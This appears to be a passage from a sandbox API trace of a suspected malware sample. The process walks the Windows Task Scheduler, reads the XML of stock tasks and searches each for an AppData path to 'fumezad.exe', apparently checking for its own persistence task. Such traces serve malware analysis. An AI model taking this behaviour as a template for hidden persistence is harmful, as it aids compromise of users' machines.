pXml=0x24da68*="\r\n\r\n \r\n \\Microsoft\\Windows\\Shell\\WindowsParentalControlsMigration\r\n $(@%SystemRoot%\\System32\\wpcmig.dll,-300)\r\n $(@%SystemRoot%\\System32\\wpcmig.dll,-301)\r\n $(@%SystemRoot%\\System32\\wpcmig.dll,-302)\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;BU)\r\n \r\n \r\n \r\n true\r\n PT1S\r\n \r\n \r\n \r\n true\r\n \r\n false\r\n false\r\n \r\n false\r\n true\r\n Parallel\r\n false\r\n false\r\n true\r\n true\r\n false\r\n PT0S\r\n false\r\n true\r\n http://schemas.microsoft.com/windows/2004/02/mit/task\r\n \r\n PT1M\r\n 1\r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n {343D770D-7788-47c2-B62A-B7C4CED925CB}\r\n \r\n \r\n") returned 0x0 [0138.149] StrStrIW (lpFirst="\r\n\r\n \r\n \\Microsoft\\Windows\\Shell\\WindowsParentalControlsMigration\r\n $(@%SystemRoot%\\System32\\wpcmig.dll,-300)\r\n $(@%SystemRoot%\\System32\\wpcmig.dll,-301)\r\n $(@%SystemRoot%\\System32\\wpcmig.dll,-302)\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;BU)\r\n \r\n \r\n \r\n true\r\n PT1S\r\n \r\n \r\n \r\n true\r\n \r\n false\r\n false\r\n \r\n false\r\n true\r\n Parallel\r\n false\r\n false\r\n true\r\n true\r\n false\r\n PT0S\r\n false\r\n true\r\n http://schemas.microsoft.com/windows/2004/02/mit/task\r\n \r\n PT1M\r\n 1\r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n {343D770D-7788-47c2-B62A-B7C4CED925CB}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.149] IUnknown:Release (This=0x127080) returned 0x0 [0138.149] IUnknown:Release (This=0x126f30) returned 0x0 [0138.149] ITaskFolder:GetFolders (in: This=0x126ea0, flags=0, ppFolders=0x24da78 | out: ppFolders=0x24da78*=0x126f30) returned 0x0 [0138.150] ITaskFolderCollection:get_Count (in: This=0x126f30, pCount=0x24dbe8 | out: pCount=0x24dbe8*=0) returned 0x0 [0138.150] IUnknown:Release (This=0x126f30) returned 0x0 [0138.150] TaskScheduler:IUnknown:Release (This=0x126ea0) returned 0x0 [0138.150] ITaskFolderCollection:get_Item (in: This=0x126d50, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1e, varVal2=0x0), ppFolder=0x24dbf0 | out: ppFolder=0x24dbf0*=0x126ea0) returned 0x0 [0138.150] ITaskFolder:GetTasks (in: This=0x126ea0, flags=1, ppTasks=0x24da70 | out: ppTasks=0x24da70*=0x126f30) returned 0x0 [0138.153] IRegisteredTaskCollection:get_Count (in: This=0x126f30, pCount=0x24dbd0 | out: pCount=0x24dbd0*=4) returned 0x0 [0138.153] IRegisteredTaskCollection:get_Item (in: This=0x126f30, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x127080) returned 0x0 [0138.153] IRegisteredTask:get_Name (in: This=0x127080, pName=0x24da80 | out: pName=0x24da80*="AutoWake") returned 0x0 [0138.153] IRegisteredTask:get_Xml (in: This=0x127080, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;LS)(A;;FR;;;AU)\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1000)\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1001)\r\n Microsoft\\Windows\\SideShow\\AutoWake\r\n 2005-10-01T00:00:00-08:00\r\n 1.0\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1201)\r\n \r\n \r\n \r\n true\r\n PT1M\r\n \r\n \r\n \r\n \r\n S-1-5-19\r\n LeastPrivilege\r\n InteractiveToken\r\n \r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n false\r\n false\r\n false\r\n false\r\n 7\r\n PT0S\r\n true\r\n \r\n \r\n \r\n {E51DFD48-AA36-4B45-BB52-E831F02E8316}\r\n \r\n \r\n") returned 0x0 [0138.155] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;LS)(A;;FR;;;AU)\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1000)\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1001)\r\n Microsoft\\Windows\\SideShow\\AutoWake\r\n 2005-10-01T00:00:00-08:00\r\n 1.0\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1201)\r\n \r\n \r\n \r\n true\r\n PT1M\r\n \r\n \r\n \r\n \r\n S-1-5-19\r\n LeastPrivilege\r\n InteractiveToken\r\n \r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n false\r\n false\r\n false\r\n false\r\n 7\r\n PT0S\r\n true\r\n \r\n \r\n \r\n {E51DFD48-AA36-4B45-BB52-E831F02E8316}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.155] IUnknown:Release (This=0x127080) returned 0x0 [0138.155] IRegisteredTaskCollection:get_Item (in: This=0x126f30, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x127080) returned 0x0 [0138.155] IRegisteredTask:get_Name (in: This=0x127080, pName=0x24da80 | out: pName=0x24da80*="GadgetManager") returned 0x0 [0138.155] IRegisteredTask:get_Xml (in: This=0x127080, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n D:(A;OICI;GA;;;SY)(A;OICI;GA;;;BA)(A;OICI;FRFX;;;IU)\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1000)\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1001)\r\n Microsoft\\Windows\\SideShow\\GadgetManager\r\n 2005-10-01T00:00:00-08:00\r\n 1.0\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1203)\r\n \r\n \r\n \r\n false\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n Queue\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n true\r\n false\r\n false\r\n false\r\n 7\r\n true\r\n \r\n \r\n \r\n {FF87090D-4A9A-4f47-879B-29A80C355D61}\r\n \r\n \r\n \r\n") returned 0x0 [0138.157] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;OICI;GA;;;SY)(A;OICI;GA;;;BA)(A;OICI;FRFX;;;IU)\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1000)\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1001)\r\n Microsoft\\Windows\\SideShow\\GadgetManager\r\n 2005-10-01T00:00:00-08:00\r\n 1.0\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1203)\r\n \r\n \r\n \r\n false\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n Queue\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n true\r\n false\r\n false\r\n false\r\n 7\r\n true\r\n \r\n \r\n \r\n {FF87090D-4A9A-4f47-879B-29A80C355D61}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.157] IUnknown:Release (This=0x127080) returned 0x0 [0138.157] IRegisteredTaskCollection:get_Item (in: This=0x126f30, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x127080) returned 0x0 [0138.158] IRegisteredTask:get_Name (in: This=0x127080, pName=0x24da80 | out: pName=0x24da80*="SessionAgent") returned 0x0 [0138.158] IRegisteredTask:get_Xml (in: This=0x127080, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n D:(A;OICI;GA;;;SY)(A;OICI;GA;;;BA)(A;OICI;GRGWGX;;;IU)\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1000)\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1001)\r\n Microsoft\\Windows\\SideShow\\SessionAgent\r\n 2005-10-01T00:00:00-08:00\r\n 1.0\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1202)\r\n \r\n \r\n \r\n true\r\n PT15S\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n false\r\n false\r\n false\r\n false\r\n 7\r\n PT0S\r\n true\r\n \r\n \r\n \r\n {45F26E9E-6199-477F-85DA-AF1EDfE067B1}\r\n \r\n \r\n") returned 0x0 [0138.159] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;OICI;GA;;;SY)(A;OICI;GA;;;BA)(A;OICI;GRGWGX;;;IU)\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1000)\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1001)\r\n Microsoft\\Windows\\SideShow\\SessionAgent\r\n 2005-10-01T00:00:00-08:00\r\n 1.0\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1202)\r\n \r\n \r\n \r\n true\r\n PT15S\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n false\r\n false\r\n false\r\n false\r\n 7\r\n PT0S\r\n true\r\n \r\n \r\n \r\n {45F26E9E-6199-477F-85DA-AF1EDfE067B1}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.159] IUnknown:Release (This=0x127080) returned 0x0 [0138.160] IRegisteredTaskCollection:get_Item (in: This=0x126f30, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x4, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x127080) returned 0x0 [0138.160] IRegisteredTask:get_Name (in: This=0x127080, pName=0x24da80 | out: pName=0x24da80*="SystemDataProviders") returned 0x0 [0138.160] IRegisteredTask:get_Xml (in: This=0x127080, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;GRGWGX;;;LS)\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1000)\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1001)\r\n Microsoft\\Windows\\SideShow\\SystemDataProviders\r\n 2005-10-01T00:00:00-08:00\r\n 1.0\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1200)\r\n \r\n \r\n \r\n true\r\n PT30S\r\n \r\n \r\n \r\n \r\n S-1-5-19\r\n LeastPrivilege\r\n InteractiveToken\r\n \r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n false\r\n false\r\n false\r\n false\r\n 7\r\n PT0S\r\n true\r\n \r\n \r\n \r\n {7CCA6768-8373-4D28-8876-83E8B4E3A969}\r\n \r\n \r\n") returned 0x0 [0138.161] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;GRGWGX;;;LS)\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1000)\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1001)\r\n Microsoft\\Windows\\SideShow\\SystemDataProviders\r\n 2005-10-01T00:00:00-08:00\r\n 1.0\r\n $(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1200)\r\n \r\n \r\n \r\n true\r\n PT30S\r\n \r\n \r\n \r\n \r\n S-1-5-19\r\n LeastPrivilege\r\n InteractiveToken\r\n \r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n false\r\n false\r\n false\r\n false\r\n 7\r\n PT0S\r\n true\r\n \r\n \r\n \r\n {7CCA6768-8373-4D28-8876-83E8B4E3A969}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.162] IUnknown:Release (This=0x127080) returned 0x0 [0138.162] IUnknown:Release (This=0x126f30) returned 0x0 [0138.162] ITaskFolder:GetFolders (in: This=0x126ea0, flags=0, ppFolders=0x24da78 | out: ppFolders=0x24da78*=0x126f30) returned 0x0 [0138.163] ITaskFolderCollection:get_Count (in: This=0x126f30, pCount=0x24dbe8 | out: pCount=0x24dbe8*=0) returned 0x0 [0138.163] IUnknown:Release (This=0x126f30) returned 0x0 [0138.163] TaskScheduler:IUnknown:Release (This=0x126ea0) returned 0x0 [0138.163] ITaskFolderCollection:get_Item (in: This=0x126d50, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1f, varVal2=0x0), ppFolder=0x24dbf0 | out: ppFolder=0x24dbf0*=0x126ea0) returned 0x0 [0138.163] ITaskFolder:GetTasks (in: This=0x126ea0, flags=1, ppTasks=0x24da70 | out: ppTasks=0x24da70*=0x126f60) returned 0x0 [0138.164] IRegisteredTaskCollection:get_Count (in: This=0x126f60, pCount=0x24dbd0 | out: pCount=0x24dbd0*=1) returned 0x0 [0138.164] IRegisteredTaskCollection:get_Item (in: This=0x126f60, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x1270d0) returned 0x0 [0138.164] IRegisteredTask:get_Name (in: This=0x1270d0, pName=0x24da80 | out: pName=0x24da80*="SvcRestartTask") returned 0x0 [0138.164] IRegisteredTask:get_Xml (in: This=0x1270d0, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n \\Microsoft\\Windows\\SoftwareProtectionPlatform\\SvcRestartTask\r\n D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;S-1-5-80-123231216-2592883651-3715271367-3753151631-4175906628)\r\n 1.0\r\n $(@%systemroot%\\system32\\sppc.dll,-200)\r\n $(@%systemroot%\\system32\\sppc.dll,-200)\r\n $(@%systemroot%\\system32\\sppc.dll,-201)\r\n \r\n \r\n \r\n 2004-01-01T00:00:00\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-20\r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n false\r\n true\r\n false\r\n true\r\n false\r\n true\r\n false\r\n false\r\n true\r\n false\r\n PT0S\r\n 7\r\n \r\n PT1M\r\n 3\r\n \r\n \r\n \r\n \r\n sc.exe\r\n start sppsvc\r\n \r\n \r\n") returned 0x0 [0138.166] StrStrIW (lpFirst="\r\n\r\n \r\n \\Microsoft\\Windows\\SoftwareProtectionPlatform\\SvcRestartTask\r\n D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;S-1-5-80-123231216-2592883651-3715271367-3753151631-4175906628)\r\n 1.0\r\n $(@%systemroot%\\system32\\sppc.dll,-200)\r\n $(@%systemroot%\\system32\\sppc.dll,-200)\r\n $(@%systemroot%\\system32\\sppc.dll,-201)\r\n \r\n \r\n \r\n 2004-01-01T00:00:00\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-20\r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n false\r\n true\r\n false\r\n true\r\n false\r\n true\r\n false\r\n false\r\n true\r\n false\r\n PT0S\r\n 7\r\n \r\n PT1M\r\n 3\r\n \r\n \r\n \r\n \r\n sc.exe\r\n start sppsvc\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.167] IUnknown:Release (This=0x1270d0) returned 0x0 [0138.167] IUnknown:Release (This=0x126f60) returned 0x0 [0138.167] ITaskFolder:GetFolders (in: This=0x126ea0, flags=0, ppFolders=0x24da78 | out: ppFolders=0x24da78*=0x126f60) returned 0x0 [0138.168] ITaskFolderCollection:get_Count (in: This=0x126f60, pCount=0x24dbe8 | out: pCount=0x24dbe8*=0) returned 0x0 [0138.168] IUnknown:Release (This=0x126f60) returned 0x0 [0138.168] TaskScheduler:IUnknown:Release (This=0x126ea0) returned 0x0 [0138.168] ITaskFolderCollection:get_Item (in: This=0x126d50, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x20, varVal2=0x0), ppFolder=0x24dbf0 | out: ppFolder=0x24dbf0*=0x126ea0) returned 0x0 [0138.168] ITaskFolder:GetTasks (in: This=0x126ea0, flags=1, ppTasks=0x24da70 | out: ppTasks=0x24da70*=0x126f40) returned 0x0 [0138.169] IRegisteredTaskCollection:get_Count (in: This=0x126f40, pCount=0x24dbd0 | out: pCount=0x24dbd0*=0) returned 0x0 [0138.169] IUnknown:Release (This=0x126f40) returned 0x0 [0138.169] ITaskFolder:GetFolders (in: This=0x126ea0, flags=0, ppFolders=0x24da78 | out: ppFolders=0x24da78*=0x126f40) returned 0x0 [0138.170] ITaskFolderCollection:get_Count (in: This=0x126f40, pCount=0x24dbe8 | out: pCount=0x24dbe8*=0) returned 0x0 [0138.170] IUnknown:Release (This=0x126f40) returned 0x0 [0138.170] TaskScheduler:IUnknown:Release (This=0x126ea0) returned 0x0 [0138.170] ITaskFolderCollection:get_Item (in: This=0x126d50, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x21, varVal2=0x0), ppFolder=0x24dbf0 | out: ppFolder=0x24dbf0*=0x126ea0) returned 0x0 [0138.170] ITaskFolder:GetTasks (in: This=0x126ea0, flags=1, ppTasks=0x24da70 | out: ppTasks=0x24da70*=0x126f40) returned 0x0 [0138.171] IRegisteredTaskCollection:get_Count (in: This=0x126f40, pCount=0x24dbd0 | out: pCount=0x24dbd0*=1) returned 0x0 [0138.171] IRegisteredTaskCollection:get_Item (in: This=0x126f40, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x1270a0) returned 0x0 [0138.172] IRegisteredTask:get_Name (in: This=0x1270a0, pName=0x24da80 | out: pName=0x24da80*="SR") returned 0x0 [0138.172] IRegisteredTask:get_Xml (in: This=0x1270a0, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n $(@%systemroot%\\system32\\srrstr.dll,-320)\r\n $(@%systemroot%\\system32\\srrstr.dll,-321)\r\n $(@%systemroot%\\system32\\srrstr.dll,-322)\r\n Microsoft\\Windows\\SystemRestore\\SR\r\n \r\n \r\n \r\n 2005-06-14T00:00:00\r\n true\r\n \r\n 1\r\n \r\n \r\n \r\n PT30M\r\n true\r\n \r\n \r\n \r\n \r\n PT10M\r\n PT23H\r\n false\r\n false\r\n \r\n true\r\n true\r\n IgnoreNew\r\n true\r\n false\r\n true\r\n true\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n /d srrstr.dll,ExecuteScheduledSPPCreation\r\n \r\n \r\n") returned 0x0 [0138.173] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%systemroot%\\system32\\srrstr.dll,-320)\r\n $(@%systemroot%\\system32\\srrstr.dll,-321)\r\n $(@%systemroot%\\system32\\srrstr.dll,-322)\r\n Microsoft\\Windows\\SystemRestore\\SR\r\n \r\n \r\n \r\n 2005-06-14T00:00:00\r\n true\r\n \r\n 1\r\n \r\n \r\n \r\n PT30M\r\n true\r\n \r\n \r\n \r\n \r\n PT10M\r\n PT23H\r\n false\r\n false\r\n \r\n true\r\n true\r\n IgnoreNew\r\n true\r\n false\r\n true\r\n true\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n /d srrstr.dll,ExecuteScheduledSPPCreation\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.174] IUnknown:Release (This=0x1270a0) returned 0x0 [0138.174] IUnknown:Release (This=0x126f40) returned 0x0 [0138.174] ITaskFolder:GetFolders (in: This=0x126ea0, flags=0, ppFolders=0x24da78 | out: ppFolders=0x24da78*=0x126f40) returned 0x0 [0138.174] ITaskFolderCollection:get_Count (in: This=0x126f40, pCount=0x24dbe8 | out: pCount=0x24dbe8*=0) returned 0x0 [0138.174] IUnknown:Release (This=0x126f40) returned 0x0 [0138.174] TaskScheduler:IUnknown:Release (This=0x126ea0) returned 0x0 [0138.174] ITaskFolderCollection:get_Item (in: This=0x126d50, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x22, varVal2=0x0), ppFolder=0x24dbf0 | out: ppFolder=0x24dbf0*=0x126ea0) returned 0x0 [0138.175] ITaskFolder:GetTasks (in: This=0x126ea0, flags=1, ppTasks=0x24da70 | out: ppTasks=0x24da70*=0x126f40) returned 0x0 [0138.176] IRegisteredTaskCollection:get_Count (in: This=0x126f40, pCount=0x24dbd0 | out: pCount=0x24dbd0*=1) returned 0x0 [0138.176] IRegisteredTaskCollection:get_Item (in: This=0x126f40, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x127090) returned 0x0 [0138.176] IRegisteredTask:get_Name (in: This=0x127090, pName=0x24da80 | out: pName=0x24da80*="Interactive") returned 0x0 [0138.176] IRegisteredTask:get_Xml (in: This=0x127090, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n $(@%systemroot%\\system32\\wdc.dll,-10041)\r\n 1.0\r\n $(@%systemroot%\\system32\\wdc.dll,-10042)\r\n Microsoft\\Windows\\Task Manager\\Interactive\r\n $(@%systemroot%\\system32\\wdc.dll,-10043)\r\n O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;IU)\r\n \r\n \r\n true\r\n Parallel\r\n true\r\n false\r\n false\r\n PT0S\r\n true\r\n 5\r\n true\r\n \r\n \r\n \r\n S-1-5-4\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n {855fec53-d2e4-4999-9e87-3414e9cf0ff4}\r\n \r\n \r\n \r\n") returned 0x0 [0138.178] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%systemroot%\\system32\\wdc.dll,-10041)\r\n 1.0\r\n $(@%systemroot%\\system32\\wdc.dll,-10042)\r\n Microsoft\\Windows\\Task Manager\\Interactive\r\n $(@%systemroot%\\system32\\wdc.dll,-10043)\r\n O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;IU)\r\n \r\n \r\n true\r\n Parallel\r\n true\r\n false\r\n false\r\n PT0S\r\n true\r\n 5\r\n true\r\n \r\n \r\n \r\n S-1-5-4\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n {855fec53-d2e4-4999-9e87-3414e9cf0ff4}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.178] IUnknown:Release (This=0x127090) returned 0x0 [0138.178] IUnknown:Release (This=0x126f40) returned 0x0 [0138.178] ITaskFolder:GetFolders (in: This=0x126ea0, flags=0, ppFolders=0x24da78 | out: ppFolders=0x24da78*=0x126f40) returned 0x0 [0138.179] ITaskFolderCollection:get_Count (in: This=0x126f40, pCount=0x24dbe8 | out: pCount=0x24dbe8*=0) returned 0x0 [0138.179] IUnknown:Release (This=0x126f40) returned 0x0 [0138.179] TaskScheduler:IUnknown:Release (This=0x126ea0) returned 0x0 [0138.179] ITaskFolderCollection:get_Item (in: This=0x126d50, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x23, varVal2=0x0), ppFolder=0x24dbf0 | out: ppFolder=0x24dbf0*=0x126ea0) returned 0x0 [0138.179] ITaskFolder:GetTasks (in: This=0x126ea0, flags=1, ppTasks=0x24da70 | out: ppTasks=0x24da70*=0x126f30) returned 0x0 [0138.182] IRegisteredTaskCollection:get_Count (in: This=0x126f30, pCount=0x24dbd0 | out: pCount=0x24dbd0*=2) returned 0x0 [0138.182] IRegisteredTaskCollection:get_Item (in: This=0x126f30, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x127080) returned 0x0 [0138.182] IRegisteredTask:get_Name (in: This=0x127080, pName=0x24da80 | out: pName=0x24da80*="IpAddressConflict1") returned 0x0 [0138.182] IRegisteredTask:get_Xml (in: This=0x127080, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n \\Microsoft\\Windows\\Tcpip\\IpAddressConflict1\r\n 2006-02-23T15:00:57\r\n $(@%SystemRoot%\\system32\\drivers\\tcpip.sys,-10000)\r\n $(@%SystemRoot%\\system32\\drivers\\tcpip.sys,-10002)\r\n \r\n \r\n \r\n true\r\n <QueryList><Query Id=\"0\" Path=\"System\"><Select Path=\"System\">*[System[Provider[@Name='Tcpip'] and EventID=4198]]</Select></Query></QueryList>\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n true\r\n IgnoreNew\r\n true\r\n true\r\n true\r\n false\r\n false\r\n true\r\n true\r\n false\r\n false\r\n false\r\n 7\r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n ndfapi.dll,NdfRunDllDuplicateIPOffendingSystem\r\n \r\n \r\n") returned 0x0 [0138.185] StrStrIW (lpFirst="\r\n\r\n \r\n \\Microsoft\\Windows\\Tcpip\\IpAddressConflict1\r\n 2006-02-23T15:00:57\r\n $(@%SystemRoot%\\system32\\drivers\\tcpip.sys,-10000)\r\n $(@%SystemRoot%\\system32\\drivers\\tcpip.sys,-10002)\r\n \r\n \r\n \r\n true\r\n <QueryList><Query Id=\"0\" Path=\"System\"><Select Path=\"System\">*[System[Provider[@Name='Tcpip'] and EventID=4198]]</Select></Query></QueryList>\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n true\r\n IgnoreNew\r\n true\r\n true\r\n true\r\n false\r\n false\r\n true\r\n true\r\n false\r\n false\r\n false\r\n 7\r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n ndfapi.dll,NdfRunDllDuplicateIPOffendingSystem\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.185] IUnknown:Release (This=0x127080) returned 0x0 [0138.185] IRegisteredTaskCollection:get_Item (in: This=0x126f30, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x127080) returned 0x0 [0138.186] IRegisteredTask:get_Name (in: This=0x127080, pName=0x24da80 | out: pName=0x24da80*="IpAddressConflict2") returned 0x0 [0138.186] IRegisteredTask:get_Xml (in: This=0x127080, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n \\Microsoft\\Windows\\Tcpip\\IpAddressConflict2\r\n 2006-02-23T15:00:57\r\n $(@%SystemRoot%\\system32\\drivers\\tcpip.sys,-10000)\r\n $(@%SystemRoot%\\system32\\drivers\\tcpip.sys,-10002)\r\n \r\n \r\n \r\n 2006-02-23T16:27:43\r\n true\r\n <QueryList><Query Id=\"0\" Path=\"System\"><Select Path=\"System\">*[System[Provider[@Name='Tcpip'] and EventID=4199]]</Select></Query></QueryList>\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n true\r\n IgnoreNew\r\n true\r\n true\r\n true\r\n false\r\n false\r\n true\r\n true\r\n false\r\n false\r\n false\r\n 7\r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n 